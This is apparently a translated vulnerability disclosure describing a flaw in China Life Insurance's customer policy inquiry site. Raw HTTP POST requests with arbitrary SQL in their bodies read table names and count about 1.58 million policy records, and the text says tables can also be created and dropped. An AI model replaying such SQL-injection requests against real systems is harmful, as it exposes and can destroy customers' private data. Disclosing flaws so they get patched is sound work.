A System Defect in China Life can cause leakage of user records in the system

A System Defect in China Life can cause leakage of user records in the system

Design defects

China Life Insurance customer policy Inquiry System
 

**. **: 8443/cusQuery/indexlis. jsp
 

Baidu to a page **. **: 8443/cusQuery/customerlogon/CustomerActivateInput1.jsp
 

Query captured packets and you will get a post
 

POST **.**.**.**:8443/cusQuery/common/easyQueryVer3/EasyQueryXML.jsp HTTP/1.1Accept: */*Accept-Language: zh-cnReferer: **.**.**.**:8443/cusQuery/customerlogon/CustomerActivateInput1.jspContent-Type: application/x-www-form-urlencodedUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Host: **.**.**.**:8443Content-Length: 31Connection: Keep-AliveCache-Control: no-cacheCookie: JSESSIONID=559940556C121AB229B8E58D26AA24AAselect sysdate from dual &1&0&0

See SQL

So we can construct it ourselves.

select TABLE_NAME,NUM_ROWS from tabs &1&0&0

POST **.**.**.**:8443/cusQuery/common/easyQueryVer3/EasyQueryXML.jsp HTTP/1.1Accept: */*Accept-Language: zh-cnReferer: **.**.**.**:8443/cusQuery/customerlogon/CustomerActivateInput1.jspContent-Type: application/x-www-form-urlencodedUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Host: **.**.**.**:8443Content-Length: 35Connection: Keep-AliveCache-Control: no-cacheCookie: JSESSIONID=559940556C121AB229B8E58D26AA24AAselect count(*) from lccont  &1&0&0

The lccont table contains 1579524 data records.
 

View the first 100
 

In fact, you can add, delete, and modify tables not only for queries.

Create a table named wooyun
 

Check whether the wooyun table exists.
 

Delete A wooyun table

Drop table wooyun
 

If the table cannot be found, the new table will not be added. If the whole database is maliciously deleted, it will be a tragedy.

Solution:

Patch.